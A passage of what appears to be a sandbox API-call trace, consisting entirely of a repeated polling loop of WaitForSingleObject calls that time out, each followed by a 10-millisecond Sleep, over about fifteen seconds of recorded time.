WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.316] Sleep (dwMilliseconds=0xa) [0273.330] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.330] Sleep (dwMilliseconds=0xa) [0273.349] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.349] Sleep (dwMilliseconds=0xa) [0273.486] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.486] Sleep (dwMilliseconds=0xa) [0273.536] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.536] Sleep (dwMilliseconds=0xa) [0273.555] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.556] Sleep (dwMilliseconds=0xa) [0273.580] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.580] Sleep (dwMilliseconds=0xa) [0273.595] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.595] Sleep (dwMilliseconds=0xa) [0273.646] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.646] Sleep (dwMilliseconds=0xa) [0273.707] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.707] Sleep (dwMilliseconds=0xa) [0273.814] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.814] Sleep (dwMilliseconds=0xa) [0273.853] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.853] Sleep (dwMilliseconds=0xa) [0273.932] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.932] Sleep (dwMilliseconds=0xa) [0273.982] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.982] Sleep (dwMilliseconds=0xa) [0273.996] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0273.997] Sleep (dwMilliseconds=0xa) [0274.024] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.024] Sleep (dwMilliseconds=0xa) [0274.039] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.039] Sleep (dwMilliseconds=0xa) [0274.109] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.109] Sleep (dwMilliseconds=0xa) [0274.143] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.143] Sleep (dwMilliseconds=0xa) [0274.180] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.180] Sleep (dwMilliseconds=0xa) [0274.232] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.232] Sleep (dwMilliseconds=0xa) [0274.266] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.266] Sleep (dwMilliseconds=0xa) [0274.281] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.282] Sleep (dwMilliseconds=0xa) [0274.294] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.294] Sleep (dwMilliseconds=0xa) [0274.308] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.308] Sleep (dwMilliseconds=0xa) [0274.326] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.326] Sleep (dwMilliseconds=0xa) [0274.347] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.347] Sleep (dwMilliseconds=0xa) [0274.364] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.364] Sleep (dwMilliseconds=0xa) [0274.465] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.465] Sleep (dwMilliseconds=0xa) [0274.480] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.480] Sleep (dwMilliseconds=0xa) [0274.509] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.509] Sleep (dwMilliseconds=0xa) [0274.554] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.554] Sleep (dwMilliseconds=0xa) [0274.570] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.570] Sleep (dwMilliseconds=0xa) [0274.584] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.584] Sleep (dwMilliseconds=0xa) [0274.620] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.620] Sleep (dwMilliseconds=0xa) [0274.632] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.632] Sleep (dwMilliseconds=0xa) [0274.664] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.665] Sleep (dwMilliseconds=0xa) [0274.699] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.699] Sleep (dwMilliseconds=0xa) [0274.735] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.735] Sleep (dwMilliseconds=0xa) [0274.770] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.770] Sleep (dwMilliseconds=0xa) [0274.804] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.804] Sleep (dwMilliseconds=0xa) [0274.931] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0274.931] Sleep (dwMilliseconds=0xa) [0275.001] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.001] Sleep (dwMilliseconds=0xa) [0275.083] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.083] Sleep (dwMilliseconds=0xa) [0275.222] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.222] Sleep (dwMilliseconds=0xa) [0275.445] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.446] Sleep (dwMilliseconds=0xa) [0275.533] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.533] Sleep (dwMilliseconds=0xa) [0275.611] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.611] Sleep (dwMilliseconds=0xa) [0275.688] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.688] Sleep (dwMilliseconds=0xa) [0275.833] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.833] Sleep (dwMilliseconds=0xa) [0275.896] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.896] Sleep (dwMilliseconds=0xa) [0275.946] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.946] Sleep (dwMilliseconds=0xa) [0275.992] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0275.992] Sleep (dwMilliseconds=0xa) [0276.111] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.111] Sleep (dwMilliseconds=0xa) [0276.240] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.240] Sleep (dwMilliseconds=0xa) [0276.310] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.310] Sleep (dwMilliseconds=0xa) [0276.441] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.441] Sleep (dwMilliseconds=0xa) [0276.514] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.514] Sleep (dwMilliseconds=0xa) [0276.636] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.636] Sleep (dwMilliseconds=0xa) [0276.674] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.674] Sleep (dwMilliseconds=0xa) [0276.711] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.711] Sleep (dwMilliseconds=0xa) [0276.750] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.750] Sleep (dwMilliseconds=0xa) [0276.787] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.787] Sleep (dwMilliseconds=0xa) [0276.823] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.823] Sleep (dwMilliseconds=0xa) [0276.860] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.860] Sleep (dwMilliseconds=0xa) [0276.915] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.915] Sleep (dwMilliseconds=0xa) [0276.957] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.957] Sleep (dwMilliseconds=0xa) [0276.993] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0276.993] Sleep (dwMilliseconds=0xa) [0277.055] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.055] Sleep (dwMilliseconds=0xa) [0277.164] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.164] Sleep (dwMilliseconds=0xa) [0277.308] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.309] Sleep (dwMilliseconds=0xa) [0277.468] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.468] Sleep (dwMilliseconds=0xa) [0277.540] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.540] Sleep (dwMilliseconds=0xa) [0277.648] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.649] Sleep (dwMilliseconds=0xa) [0277.720] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.720] Sleep (dwMilliseconds=0xa) [0277.800] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.800] Sleep (dwMilliseconds=0xa) [0277.893] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.893] Sleep (dwMilliseconds=0xa) [0277.929] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.929] Sleep (dwMilliseconds=0xa) [0277.973] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0277.973] Sleep (dwMilliseconds=0xa) [0278.011] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.011] Sleep (dwMilliseconds=0xa) [0278.048] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.048] Sleep (dwMilliseconds=0xa) [0278.085] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.085] Sleep (dwMilliseconds=0xa) [0278.183] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.183] Sleep (dwMilliseconds=0xa) [0278.218] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.219] Sleep (dwMilliseconds=0xa) [0278.254] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.254] Sleep (dwMilliseconds=0xa) [0278.480] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.481] Sleep (dwMilliseconds=0xa) [0278.553] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.553] Sleep (dwMilliseconds=0xa) [0278.632] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.632] Sleep (dwMilliseconds=0xa) [0278.702] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.702] Sleep (dwMilliseconds=0xa) [0278.788] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.789] Sleep (dwMilliseconds=0xa) [0278.933] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.933] Sleep (dwMilliseconds=0xa) [0278.990] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0278.990] Sleep (dwMilliseconds=0xa) [0279.045] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.045] Sleep (dwMilliseconds=0xa) [0279.110] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.110] Sleep (dwMilliseconds=0xa) [0279.181] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.182] Sleep (dwMilliseconds=0xa) [0279.218] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.218] Sleep (dwMilliseconds=0xa) [0279.253] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.254] Sleep (dwMilliseconds=0xa) [0279.292] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.292] Sleep (dwMilliseconds=0xa) [0279.329] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.329] Sleep (dwMilliseconds=0xa) [0279.367] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.367] Sleep (dwMilliseconds=0xa) [0279.525] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.525] Sleep (dwMilliseconds=0xa) [0279.661] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.661] Sleep (dwMilliseconds=0xa) [0279.733] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.733] Sleep (dwMilliseconds=0xa) [0279.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.789] Sleep (dwMilliseconds=0xa) [0279.860] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.861] Sleep (dwMilliseconds=0xa) [0279.931] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0279.931] Sleep (dwMilliseconds=0xa) [0280.035] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.035] Sleep (dwMilliseconds=0xa) [0280.154] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.154] Sleep (dwMilliseconds=0xa) [0280.194] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.194] Sleep (dwMilliseconds=0xa) [0280.245] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.245] Sleep (dwMilliseconds=0xa) [0280.280] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.280] Sleep (dwMilliseconds=0xa) [0280.317] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.317] Sleep (dwMilliseconds=0xa) [0280.353] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.353] Sleep (dwMilliseconds=0xa) [0280.546] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.546] Sleep (dwMilliseconds=0xa) [0280.592] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.592] Sleep (dwMilliseconds=0xa) [0280.629] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.629] Sleep (dwMilliseconds=0xa) [0280.751] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.751] Sleep (dwMilliseconds=0xa) [0280.820] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.820] Sleep (dwMilliseconds=0xa) [0280.891] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0280.891] Sleep (dwMilliseconds=0xa) [0281.023] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.023] Sleep (dwMilliseconds=0xa) [0281.098] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.098] Sleep (dwMilliseconds=0xa) [0281.182] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.182] Sleep (dwMilliseconds=0xa) [0281.271] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.271] Sleep (dwMilliseconds=0xa) [0281.320] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.320] Sleep (dwMilliseconds=0xa) [0281.357] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.357] Sleep (dwMilliseconds=0xa) [0281.498] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.498] Sleep (dwMilliseconds=0xa) [0281.545] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.545] Sleep (dwMilliseconds=0xa) [0281.586] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.586] Sleep (dwMilliseconds=0xa) [0281.623] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.623] Sleep (dwMilliseconds=0xa) [0281.671] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.671] Sleep (dwMilliseconds=0xa) [0281.706] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.706] Sleep (dwMilliseconds=0xa) [0281.755] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.755] Sleep (dwMilliseconds=0xa) [0281.877] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.877] Sleep (dwMilliseconds=0xa) [0281.948] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0281.948] Sleep (dwMilliseconds=0xa) [0282.077] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.077] Sleep (dwMilliseconds=0xa) [0282.177] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.177] Sleep (dwMilliseconds=0xa) [0282.277] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.277] Sleep (dwMilliseconds=0xa) [0282.581] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.581] Sleep (dwMilliseconds=0xa) [0282.720] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.720] Sleep (dwMilliseconds=0xa) [0282.804] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.804] Sleep (dwMilliseconds=0xa) [0282.869] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.869] Sleep (dwMilliseconds=0xa) [0282.942] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0282.943] Sleep (dwMilliseconds=0xa) [0283.091] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.091] Sleep (dwMilliseconds=0xa) [0283.224] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.224] Sleep (dwMilliseconds=0xa) [0283.337] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.337] Sleep (dwMilliseconds=0xa) [0283.587] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.587] Sleep (dwMilliseconds=0xa) [0283.683] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.683] Sleep (dwMilliseconds=0xa) [0283.764] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.764] Sleep (dwMilliseconds=0xa) [0283.800] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.801] Sleep (dwMilliseconds=0xa) [0283.848] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.848] Sleep (dwMilliseconds=0xa) [0283.891] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.891] Sleep (dwMilliseconds=0xa) [0283.931] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.931] Sleep (dwMilliseconds=0xa) [0283.966] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0283.967] Sleep (dwMilliseconds=0xa) [0284.004] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.004] Sleep (dwMilliseconds=0xa) [0284.045] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.045] Sleep (dwMilliseconds=0xa) [0284.189] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.189] Sleep (dwMilliseconds=0xa) [0284.267] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.268] Sleep (dwMilliseconds=0xa) [0284.346] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.346] Sleep (dwMilliseconds=0xa) [0284.523] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.523] Sleep (dwMilliseconds=0xa) [0284.596] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.597] Sleep (dwMilliseconds=0xa) [0284.668] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.668] Sleep (dwMilliseconds=0xa) [0284.710] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.710] Sleep (dwMilliseconds=0xa) [0284.810] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.810] Sleep (dwMilliseconds=0xa) [0284.847] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.847] Sleep (dwMilliseconds=0xa) [0284.883] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.883] Sleep (dwMilliseconds=0xa) [0284.919] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.920] Sleep (dwMilliseconds=0xa) [0284.956] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.956] Sleep (dwMilliseconds=0xa) [0284.994] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0284.994] Sleep (dwMilliseconds=0xa) [0285.051] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.051] Sleep (dwMilliseconds=0xa) [0285.085] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.086] Sleep (dwMilliseconds=0xa) [0285.123] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.123] Sleep (dwMilliseconds=0xa) [0285.193] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.193] Sleep (dwMilliseconds=0xa) [0285.472] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.472] Sleep (dwMilliseconds=0xa) [0285.566] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.566] Sleep (dwMilliseconds=0xa) [0285.637] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.637] Sleep (dwMilliseconds=0xa) [0285.710] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.710] Sleep (dwMilliseconds=0xa) [0285.778] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.778] Sleep (dwMilliseconds=0xa) [0285.852] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.852] Sleep (dwMilliseconds=0xa) [0285.892] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.892] Sleep (dwMilliseconds=0xa) [0285.956] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.956] Sleep (dwMilliseconds=0xa) [0285.995] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0285.995] Sleep (dwMilliseconds=0xa) [0286.016] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.016] Sleep (dwMilliseconds=0xa) [0286.054] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.054] Sleep (dwMilliseconds=0xa) [0286.090] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.090] Sleep (dwMilliseconds=0xa) [0286.126] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.126] Sleep (dwMilliseconds=0xa) [0286.177] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.178] Sleep (dwMilliseconds=0xa) [0286.212] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.212] Sleep (dwMilliseconds=0xa) [0286.250] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.250] Sleep (dwMilliseconds=0xa) [0286.292] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.292] Sleep (dwMilliseconds=0xa) [0286.329] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.329] Sleep (dwMilliseconds=0xa) [0286.574] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.574] Sleep (dwMilliseconds=0xa) [0286.648] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.648] Sleep (dwMilliseconds=0xa) [0286.717] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.717] Sleep (dwMilliseconds=0xa) [0286.791] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.791] Sleep (dwMilliseconds=0xa) [0286.862] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.862] Sleep (dwMilliseconds=0xa) [0286.933] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0286.933] Sleep (dwMilliseconds=0xa) [0287.046] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.046] Sleep (dwMilliseconds=0xa) [0287.148] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.148] Sleep (dwMilliseconds=0xa) [0287.188] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.188] Sleep (dwMilliseconds=0xa) [0287.232] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.232] Sleep (dwMilliseconds=0xa) [0287.268] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.268] Sleep (dwMilliseconds=0xa) [0287.307] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.307] Sleep (dwMilliseconds=0xa) [0287.352] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.353] Sleep (dwMilliseconds=0xa) [0287.486] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.486] Sleep (dwMilliseconds=0xa) [0287.524] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.524] Sleep (dwMilliseconds=0xa) [0287.669] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.669] Sleep (dwMilliseconds=0xa) [0287.742] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.743] Sleep (dwMilliseconds=0xa) [0287.818] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.818] Sleep (dwMilliseconds=0xa) [0287.890] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.890] Sleep (dwMilliseconds=0xa) [0287.962] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0287.962] Sleep (dwMilliseconds=0xa) [0288.034] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.034] Sleep (dwMilliseconds=0xa) [0288.079] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.080] Sleep (dwMilliseconds=0xa) [0288.175] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.175] Sleep (dwMilliseconds=0xa) [0288.212] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.212] Sleep (dwMilliseconds=0xa) [0288.249] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.249] Sleep (dwMilliseconds=0xa) [0288.285] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.285] Sleep (dwMilliseconds=0xa) [0288.324] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.324] Sleep (dwMilliseconds=0xa) [0288.569] WaitForSingleObject (hHandle=0x234, 